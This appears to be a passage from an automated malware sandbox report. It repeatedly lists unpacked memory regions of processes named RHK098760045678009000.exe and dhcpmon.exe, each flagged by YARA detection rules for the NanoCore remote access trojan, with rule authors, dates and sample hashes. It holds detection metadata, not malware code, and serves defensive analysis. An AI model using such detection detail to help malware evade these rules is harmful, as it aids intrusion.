        Source: 14.2.dhcpmon.exe.24f0000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0.2.RHK098760045678009000.exe.f051458.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.2.RHK098760045678009000.exe.f051458.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 0.2.RHK098760045678009000.exe.f051458.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 14.2.dhcpmon.exe.28f687c.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.dhcpmon.exe.28f687c.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 11.1.RHK098760045678009000.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 11.1.RHK098760045678009000.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 11.1.RHK098760045678009000.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 11.2.RHK098760045678009000.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 11.2.RHK098760045678009000.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 11.2.RHK098760045678009000.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 14.2.dhcpmon.exe.24a0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.dhcpmon.exe.24a0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 14.2.dhcpmon.exe.24a0000.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 21.2.dhcpmon.exe.f061458.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 21.2.dhcpmon.exe.f061458.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 21.2.dhcpmon.exe.f061458.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 14.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 14.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 11.2.RHK098760045678009000.exe.3a33258.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 11.2.RHK098760045678009000.exe.3a33258.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 14.2.dhcpmon.exe.38d3258.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.dhcpmon.exe.38d3258.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0.2.RHK098760045678009000.exe.f040000.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.2.RHK098760045678009000.exe.f040000.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 0.2.RHK098760045678009000.exe.f040000.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 11.2.RHK098760045678009000.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 11.2.RHK098760045678009000.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 11.2.RHK098760045678009000.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 23.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 23.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 23.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 11.2.RHK098760045678009000.exe.2a56864.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 11.2.RHK098760045678009000.exe.2a56864.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 11.1.RHK098760045678009000.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 11.1.RHK098760045678009000.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 11.1.RHK098760045678009000.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 14.2.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 14.2.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 23.1.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 23.1.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 23.1.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 14.2.dhcpmon.exe.24a0000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.dhcpmon.exe.24a0000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 14.2.dhcpmon.exe.24a0000.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 8.2.RHK098760045678009000.exe.f041458.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 8.2.RHK098760045678009000.exe.f041458.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 8.2.RHK098760045678009000.exe.f041458.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.2.dhcpmon.exe.f061458.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.dhcpmon.exe.f061458.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 12.2.dhcpmon.exe.f061458.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 23.2.dhcpmon.exe.3823258.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 23.2.dhcpmon.exe.3823258.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 23.2.dhcpmon.exe.38a16b4.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 23.2.dhcpmon.exe.38a16b4.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 21.2.dhcpmon.exe.f061458.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 21.2.dhcpmon.exe.f061458.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 21.2.dhcpmon.exe.f061458.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 23.2.dhcpmon.exe.4c4428.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 23.2.dhcpmon.exe.4c4428.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 23.2.dhcpmon.exe.4c4428.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 11.2.RHK098760045678009000.exe.2490000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 11.2.RHK098760045678009000.exe.2490000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 11.2.RHK098760045678009000.exe.2490000.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.2.dhcpmon.exe.f050000.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.dhcpmon.exe.f050000.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 12.2.dhcpmon.exe.f050000.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 14.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 14.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.2.dhcpmon.exe.f061458.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.dhcpmon.exe.f061458.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 12.2.dhcpmon.exe.f061458.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 14.2.dhcpmon.exe.722890.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.dhcpmon.exe.722890.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 14.2.dhcpmon.exe.722890.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 14.2.dhcpmon.exe.38d3258.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
